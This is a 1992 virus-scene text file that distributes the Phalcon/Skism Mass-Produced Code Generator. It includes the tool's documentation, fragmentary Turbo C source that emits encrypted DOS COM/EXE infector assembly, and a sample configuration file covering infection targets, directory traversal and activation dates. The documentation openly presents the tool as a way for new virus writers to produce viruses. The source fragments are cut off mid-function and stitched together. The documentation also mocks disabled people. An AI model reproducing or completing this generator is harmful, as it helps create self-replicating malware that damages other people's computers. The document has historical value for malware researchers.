Once again, -=PHALCON/SKISM=- pisses off the PD scene. Now anyone
can make their own virus, and give it to Gary Watson, the only guy on
Fidonet who we love. Without him, we would never get the fame that we
now covet so greatly. Well, that is until we got our official Pepsi
Gotta Have It Cards. Thank you Gary.
-) Gheap
----------------------------- Docs -n- code begin -----------------------------
PS-MPC
Pretty Slick Multimedia Personal Computer
(NOT)
Phalcon/Skism Mass-Produced Code Generator 0.90�
Created by Dark Angel
TABLE OF CONTENTS
TABLE OF CONTENTS i
DEDICATION i
DISCLAIMER ii
PURPOSE ii
WHAT IS THE PS-MPC? 1
USING THE PS-MPC 1
NO ACTIVATION ROUTINES 1
WHY NO IDE 2
SOURCE CODE AVAILABILITY 2
PROBLEMS 2
FUTURE ENHANCEMENTS 2
HISTORY OF VIRUS TOOLKITS A
DEDICATION
The author hereby releases this program and its source code into the
public domain as "freeware." All code generated by the program must,
however, retain the designation of said program, although all other parts
may be modified at the user's discretion. The author dedicates this
program to both the virus and anti-virus communities, both of which profit
from the introduction of the Phalcon/Skism Mass-Produced Code Generator.
Thanks are due to NoWhere Man for his excellent program VCL, which
served as the inspiration for this package.
PS-MPC Documentation - i - Phalcon/Skism 1992
DISCLAIMER
This program may cause either the intentional or unintentional
disruption of normal brain wave activity of the user due to the extreme
shock quality of the program. The author hereby absolves himself of all
liability. Persons with pacemakers beware!
The code produced by the Phalcon/Skism Mass-Produced Code Generator
is not designed to be damaging; however, the author is not responsible for
incidental damages caused by use of the program. Further, the author is
not responsible for damages caused by changes to the code generated by the
PS-MPC. The author does not condone the illegal spread of executable code
created in part or in whole by the PS-MPC. All source code and executable
files created with the aid of the PS-MPC must be distributed with the reci-
pient's full knowledge of the contents. Malicious use of the code is
strictly prohibited.
PURPOSE
The Phalcon/Skism Mass-Produced Code Generator is not designed to
create malicious code; rather, it is a learning tool from which a person
may learn to write effective viral code. The code generated by the PS-MPC
is highly optimised for both size and speed and is therefore the code
generated can be used by the fledgling virus writer as a model for future
endeavours.
PS-MPC Documentation - ii - Phalcon/Skism 1992
WHAT IS THE PS-MPC?
The Phalcon/Skism Mass-Produced Code Generator is a tool which
generates viral code according to user-designated specifications. The
output is in Masm/Tasm-compatible Intel 8086 assembly and it is up to the
user to assemble the output into working executable form. The features of
the PS-MPC include the following:
o Over 150 encryption techniques, randomly generated during each run of
the PS-MPC
o Compact, commented code, much tighter than VCL
o COM/EXE infections
o Two types of traversals
o Optional infection of Command.Com
o Critical error handler support
USING THE PS-MPC
The syntax of the PS-MPC is simple:
PS-MPC <file1> <file2> <file3>...
The parameters given to the PS-MPC are the names of the configuration
files. For example, to create two separate viruses using the configuration
files FOOBAR1.CFG and FOOBAR2.CFG, simply type "PS-MPC FOOBAR1.CFG
FOOBAR2.CFG" at the prompt.
The configuration file is a text file containing a set of parameters
which define the output of the PS-MPC. A sample configuration file,
SKELETON.CFG is included with the package. This configuration file
contains all the acceptable parameters that the PS-MPC will accept. It
also includes the defaults to each of these parameters. The configuration
file is self-explanatory, so there is no need to go into further detail at
this time.
When the Generator has completed creating the source code file/s,
simply assemble the output file/s with your favorite assembler/linker
combination. A multi-pass assembler is recommended. Masm is a poor choice
for an assembler; try Tasm. Masm requires the code to include extra
segment overrides which unnecessarily add to the code length. Masm 6.0 may
fix these problems (I'm not sure since I don't have it). Tasm, on the
other hand, is an excellent, fast, multipass assembler far superior to
Masm.
NO ACTIVATION ROUTINES
I have not included any activation routines in the package simply
because I do not think the power of creating potentially-destructive
viruses should be in the hands of persons incapable of coding a simple
activation routine in assembly. If you can rip a simple FAT-annihilator
out of another trojan, then I cannot stop you from doing so. But just
remember that the most memorable viruses are not necessarily those that
cause the most damage, but are usually those that have unusual activation
routines.
Upon finding activation conditions, the PS-MPC will generate a short
stub for the activation routine. This is located immediately after the
code for the restoration of the executable files. It is identified by the
label "activate" and is followed by a return. Insert your own activation
routine between those two lines.
PS-MPC Documentation - 1 - Phalcon/Skism 1992
WHY NO IDE (Integrated Development Environment)
Everyone agrees that Microsoft Windows is for cripples. Obviously,
you, the user of the PS-MPC, are no cripple, so you need no puny IDE with
colourful, deluxe windows to aid you. If you are a cripple, go ahead and
create the configuration file in your favorite Windows text editor. Hell,
port the code to the Macintosh and you can be truly crippled (although
you'll have your pretty windows and icons).
SOURCE CODE AVAILABILITY
This program is distributed with full source code. Although the
source should be self-explanatory, I have gone back and commented several
portions in order to facilitate understanding. The program was written in
Turbo C 2.0 and compiled in the tiny memory model. I trust that you will
not hack this program and call it your own. Source code is available only
because I think it will aid in your understanding of the program.
PROBLEMS
This program was written hastily. The bulk of the coding was
completed in under two days. Features were added by the process of
accretion during the following week. Needless to say, the code is now
extremely unmanageable. If there is enough interest in the package, I will
rewrite it in order to alleviate the strain caused in maintaining such
code. This will help in adding features as the need arises.
There MAY be some bugs in this version since it hasn't been thoroughly
tested yet. Report all bugs to me (duh). Be sure to save the configuration
file of the faulty code so the bug may be reproduced. Better yet, find the
problem, fix the C source, and send it to me. Zowie!
FUTURE ENHANCEMENTS
As you may have already noticed, this is a pre-1.0 release version of
the Generator. There are several features which I wish to add before
version 1.0. These include, but are not limited to, resident viruses,
padded-EXE infections (shorter routine), and better documentation(!). A
few surprises will be thrown in as well. I do not plan on increasing the
size of the PS-MPC.COM file dramatically, so with every addition will come
code to keep the increase in file size to a minimum. I do not intend to
devote too much time to the project as I personally don't actually use the
generator to spew out code for the group.
Note: The version included with 40Hex-8 is not the latest version. Due to
space considerations, we could not include the source code to version 0.91�
which is somewhat larger.
PS-MPC Documentation - 2 - Phalcon/Skism 1992
HISTORY OF VIRUS TOOLKITS
The first known virus toolkit was called VCS, or Virus Construction
Set. This program generated a new virus each time it was run. However,
there were no code differences at all between any two viruses generated by
VCS. All viruses generated were 1077 bytes in length and all could be
detected with the identical scan string. The advantage in this approach
was that the user needed absolutely no knowledge of 8086 assembly to take
advantage of this program. This program of limited usefulness spawned only
one well-known variant called Manta. It is not even worth mentioning here.
The second virus toolkit was CrazySoft, Inc.'s Dark Avenger Mutation
Engine (MtE). This magnificent work of Bulgarian coding allowed virus
authors to create viruses with an almost limitless number of decryption
routines. Although the author needed to know how to write 8086 assembly
code, no knowledge of the inner workings of MtE save the entry parameters
was needed to use this toolkit. It has since spawned several viruses,
including Dedicated, Pogue, Fear, and Groove.
The next virus toolkit to be released was VCL, or Virus Construction
Laboratory. This was written by NoWhere Man of NuKE. This toolkit allowed
the user many options, including the creation of parasitic COM infectors,
spawning EXE infectors, trojan horses and logic bombs. Since it could only
handle parasitic infections of the COM file format, it was of limited
usefulness. Additionally, it incorporated only one decryption formula,
once again limiting its usefulness. Further, the initial release included
a quirky installation program which failed to install properly under
certain conditions. However, this package contained a colourful IDE
loosely based on the Borland interface. This IDE was incredibly simple to
use and even the average Joe could understand how to use it without
understanding 80x86 assembly. Unfortunately, the activation routines
included with the package were of limited usefulness. Most of these
involved manipulating the BIOS memory area at segment 40h.
void code_encryption(void)
{
if (config.p.encrypt) {
srand(peek(0,0x46C));
printlabel("decrypt:","handles encryption and decryption");
if ((loop_counter = random(10)) > 6) /* if out of bounds */
loop_counter = 2; /* set it = to cx */
while (1) {
mem_counter = random(4);
if (strcmp(mem_registers[mem_counter = random(4)],
loop_registers[loop_counter]))
break;
}
if (random(2)) {
code_loop_count();
code_loop_start();
} else {
code_loop_start();
code_loop_count();
}
code_decrypt_code();
}
}
sprintf(c,"add word ptr %s[%s], xxxx",
(config.p.infectEXE) ? "cs:" : "",mem_registers[mem_counter]);
config.xor_value = 0x28;
strcpy(config.xor_comment,"flip between add/sub");
break;
}
print(b,c);
printlabel("decrypt_value dw 0","initialised at zero for null effect");
sprintf(c,"inc %s",mem_registers[mem_counter]);
print(c,"calculate new decryption location");
print(c,"");
if (loop_counter - 2)
{
sprintf(b,"dec %s",loop_registers[loop_counter]);
print(b,"If we are not done, then");
print("jnz decrypt_loop","decrypt mo'");
} else
print("loop decrypt_loop","decrypt mo'");
printlabel("startencrypt:","");
}
----------------------------------- Cut Here ----------------------------------
/* FILE: VHEADER.C */
#include "vheader.h"
void code_header(void)
{
char b[80];
sprintf(b,"; %s : %s by %s",config.asmfilename,
(config.virusname[0]) ? config.virusname : "Unknown",
(config.authorname[0])? config.authorname: "Unknown");
printlabel(b,"");
printlabel("; Created wik the Phalcon/Skism Mass-Produced Code Generator","");
sprintf(b,"; from the configuration file %s",config.configfilename);
printlabel(b,"");
printblank();
printlabel(".model tiny","Handy directive");
printlabel(".code","Virus code segment");
print("org 100h","COM file starting IP\n");
if (config.p.infectEXE)
{
sprintf(b,"id = '%s'",config.id);
printlabel(b,"ID word for EXE infections");
}
if (config.p.infectCOM)
if (config.p.encrypt)
printlabel("entry_point: db 0e9h,0,0","jmp decrypt");
else
printlabel("entry_point: db 0e9h,0,0","jmp startvirus");
printblank();
}
----------------------------------- Cut Here ----------------------------------
/* FILE: VHEAP.C */
#include "vheader.h"
char heap[30][80];
char max;
void code_heap(void)
{
printlabel("heap:","Variables not in code");
if (max)
while (max--)
printlabel(heap[max],"");
else
printlabel("; No heap to speak of","");
printlabel("endheap:","End of virus");
}
puts("PS-MPC � Phalcon/Skism Mass Produced Code Generator");
puts(" � Version 0.90� Written by Dark Angel\n");
if (argc < 2)
{
puts("Syntax: PS-MPC <file1> <file2> ...");
puts(" file1 = name of first configuration file");
puts(" file2 = name of second configuration file");
}
for (c=1;c<argc;c++)
{
if ((fp = fopen(argv[c],"rt")) == NULL)
{
printf("Error opening configuration file (%s).\n",argv[c]);
puts("Skipping file...");
continue;
}
if (!config.p.infectCOM && !config.p.infectEXE) {
puts("Warning: Virus does not infect any type of file.");
puts("Remedy: Use the \"infect\" parameter in the configuration file.");
puts("Skipping file...");
continue;
}
if (!config.asmfilename[0]) {
puts("Warning: No target file name specified.");
puts("Remedy: Use the \"filename\" parameter in the configuration file.");
puts("Skipping file...");
continue;
}
void printlabel(char *s, char *t)
{
int i = 0;
if (*s)
if (*t) {
i = fprintf(fp,"%-40s",s);
if (i > 40)
fputc(' ',fp);
fprintf(fp,"; %s",t);
} else /* if (*t) */
fprintf(fp,s);
fprintf(fp,"\n");
}
void parse_config(void)
{
char b[80];
char *c, *d;
int line = 0;
globals default_globals = {
"", /* Configuration file name */
"", /* Source code file name */
" ", /* EXE ID Word */
"", /* Virus name */
'\'', /* Deliminator for virus name */
"", /* Author name */
'\'', /* Deliminator for author name */
0, /* Minimum COM size for infection */
0, /* Maximum COM size for infection */
0, /* Infections per run */
{ 0,0,NONE,0,0,0,0 }, /* flags */
0, /* xor value */
"", /* xor comment */
0, /* number of activation conditions */
{ 0,0,0,0,0,-1,0,-1,-1,-1,0 }, /* activation conditions */
{ 0,0,0,0,0, 0,0, 0, 0, 0,-1} /* plusminus activation conditions */
};
config = default_globals;
while (1)
{
line++;
b[0]=0;
c = fgets(b,100,fp);
if (!b[0])
break;
while (isspace(*c)) c++; /* skip initial spaces */
if (!*c || *c == ';') continue; // check if this line is a comment
d = c;
while (!isspace(*d)) d++; /* isolate one word */
*d++ = 0; /* NULL terminate it */
while (isspace(*d) || (*d == '=')) d++;
if (!stricmp(c,"filename"))
{
c = d;
while (!isspace(*d)) d++; /* isolate filename */
*d = 0;
strcpy(config.asmfilename,c);
}
else if (!stricmp(c,"traversal"))
switch (toupper(*d))
{
case 'N' : config.p.traverse = NONE; break;
case 'D' : config.p.traverse = DOT_DOT; break;
default : printerror(line,*d);
}
else if (!stricmp(c,"encryption")) config.p.encrypt = getyn(line,d);
else if (!stricmp(c,"infect")) {
while (!isspace(*d)) {
switch (toupper(*d))
{
case 'C' : config.p.infectCOM = 1; break;
case 'E' : config.p.infectEXE = 1; break;
case ',' : break;
default : printerror(line,*d);
}
d++;
}
}
void code_traversal_generic(void)
{
if (config.p.infectEXE) {
lea_exe();
if (!config.p.infectCOM)
code_check();
}
if (config.p.infectCOM) {
lea_com();
if (config.p.infectEXE)
config.p.calls_check++;
else
code_check();
}
}
void lea_exe(void)
{
print("lea dx,[bp+exe_mask]","");
if (config.p.infectCOM)
print("call infect_mask","");
}
void lea_com(void)
{
print("lea dx,[bp+com_mask]","");
if (config.p.infectEXE)
print("call infect_mask","");
}
void dot_dot(void)
{
print("mov ah,3bh","change directory");
print("lea dx,[bp+dot_dot]","\"cd ..\"");
print("int 21h","");
print("jnc dir_scan","go back for mo!");
}
----------------------------------- Cut Here ----------------------------------
/* FILE: VVAR.C */
#include "vheader.h"
void code_variables(void)
{
if (config.p.infectEXE) addvar("exe_mask","db '*.exe',0","");
if (config.p.infectCOM) addvar("com_mask","db '*.com',0","");
if (config.p.traverse == DOT_DOT)
addvar("dot_dot","db '..',0","");
}
----------------------------------- Cut Here ----------------------------------
; FILE: SKELETON.CFG
; Skeleton configuration file for PS-MPC version 0.90�
; Lines beginning with semicolons denote comments
; Required parameters:
; Filename = <string>
; This is the filename to be generated by PS-MPC as the source code file.
Filename = target.asm
; Infect = (C,E)
; COM, EXE
; Note: You can mix the two, a la "Infect = C,E" Do not use a space to
; deliminate the two parameters.
Infect = C,E
; Optional parameters - Defaults are shown in square brackets
; Traversal = <N,D>
; ([None], Dot Dot)
; If None is specified, then only the files in the current directory will be
; infected. If Dot dot is specified, then files in the current directory and
; subdirectories below the current will be infected.
Traversal = N
; Encrypted = <Y,N>
; (Yes, [No])
; Only turn off encryption if you wish to limit the size of the virus.
Encryption = Y
; IDWord = XX
; ([ ],XX)
; The IDWord consists of two characters which are used to identify already
; infected EXE files. This line is not needed in COM-only infectors. Do
; not use an apostrophe or the source code will not assemble properly.
IDWord = DA
; MinSize = #
; (A,[0]..65535)
; MinSize is used only in the infection of COM files. Files under MinSize
; bytes are not infected. MinSize = 0 turns off this option. MinSize = A
; indicates use of the virus's effective length as the minimum size. This
; line is ignored in EXE-specific infectors.
MinSize = 0
; MaxSize = #
; (A,[0]..65535)
; MaxSize is used only in the infection of COM files. Files above MaxSize
; bytes are not infected. MaxSize = 0 turns off this option. MaxSize = A
; indicates automatic calculation of maximum size. This line is not needed
; in EXE-only infectors.
MaxSize = A
; Infections = #
; ([0]..255)
; Infections is an optional counter limiting the number of infections per run
; of the virus to a specific number. Infections = 0 disables this option.
Infections = 0
; ErrorHandler = <Y,N>
; (Yes, [No])
; ErrorHandler selects if you wish to include a short critical error handler
; in the virus. This handler prevents Abort, Retry, Fail messages by taking
; over the critical error interrupt. Attempted infection of files on write-
; protected diskettes will not generate an error if this option is set.
ErrorHandler = Y
; CommandCom = <Y,N>
; (Yes, [No])
; This flag indicates whether you wish the virus to infect COMMAND.COM
; 'Yes' turns off the check for COMMAND.COM, thus saving space.
CommandCom = N
; VirusName = <string>
; The only limitation to the string is that you may not use both the single
; and double quotes together in the string, i.e. the string B'li"p is not
; legal.
VirusName = [Skeleton]
; AuthorName = <string>
; The same constraints apply to AuthorName.
AuthorName = Deke
; AllowZero = <Y,N>
; (Yes, [No])
; This flags whether the virus will allow an encryption value of 0, which
; would effectively leave it in an unencrypted state. 'Yes' disables the
; zero check, thereby shortening code length.
AllowZero = N
; Activation Conditions
; All conditions must be satisfied for activation to occur
; Always = <Y,N>
; (Yes, [No])
; This flags whether the virus always activates, although I can't imagine a
; useful virus that does so.
; Always = N
; IfMonth = #
; <1..12><-,+>
; Activate if the month is equal to the specified number. Adding a minus sign
; after the month indicates activation before or during the specified month.
; Adding a plus sign after the month indicates activation during or after the
; specified month.
; IfMonth = 11+ ; Activate in either November or December
; IfDay = #
; <1..31><-,+>
; Activate if the date is on a certain date Adding a minus sign after the day
; indicates activation on or before that day. Similarly, adding a plus sign
; indicates activation on or after that day. Note: the program does not check
; to see if the number inputted is a valid date. For example, combining
; IfMonth=2 and IfDay=30+ will NOT result in an error, although the virus will
; clearly never activate.
; IfDay = 15+ ; Activate after the fifteenth of the month
; IfYear = #
; <0..65535><-,+>
; Activate during a certain year or years. Don't be stupid and put a
; ridiculous year such as 1-.
; IfYear = 1993+ ; Activate after 1993
; IfDOW = #
; <0..6><-,+>
; 0 = Sunday, 1 = Monday, etc.
; Activate on, before, or after a particular day of the week.
; IfDOW = 0 ; Activate only on Sundays
; IfMonthDay = #,#
; <#,#><-,+>
; Activate on, before, or after a particular day of the year. This differs
; from the combination of IfMonth and IfDay.
; IfMonthDay = 5,9+ ; Activate only after May 9th
; compare to:
; IfMonth = 5+ ; Activate in May through December, but only if the
; IfDay = 9+ ; day is on or after the 8th. July 1st is NOT an
; activation date
; IfHour = #
; <0..23><-,+>
; This should be self-explanatory at this point.
; IfHour = 12 ; Activate any time from 12 noon -> 1 P.M.
; IfSecond = #
; <0..59><-,+> ;; check 0
; This is somewhat useless, in my estimation
; IfSecond = 30+
; Percentage = #
; <1..99>
; This uses the 1/100 second counter as a random number. If the counter is
; less than the percentage, then the virus will activate.
; Percentage = 50 ; Even odds
--------------------------------- Stop Cutting --------------------------------
Downloaded From P-80 International Information Systems 304-744-2253
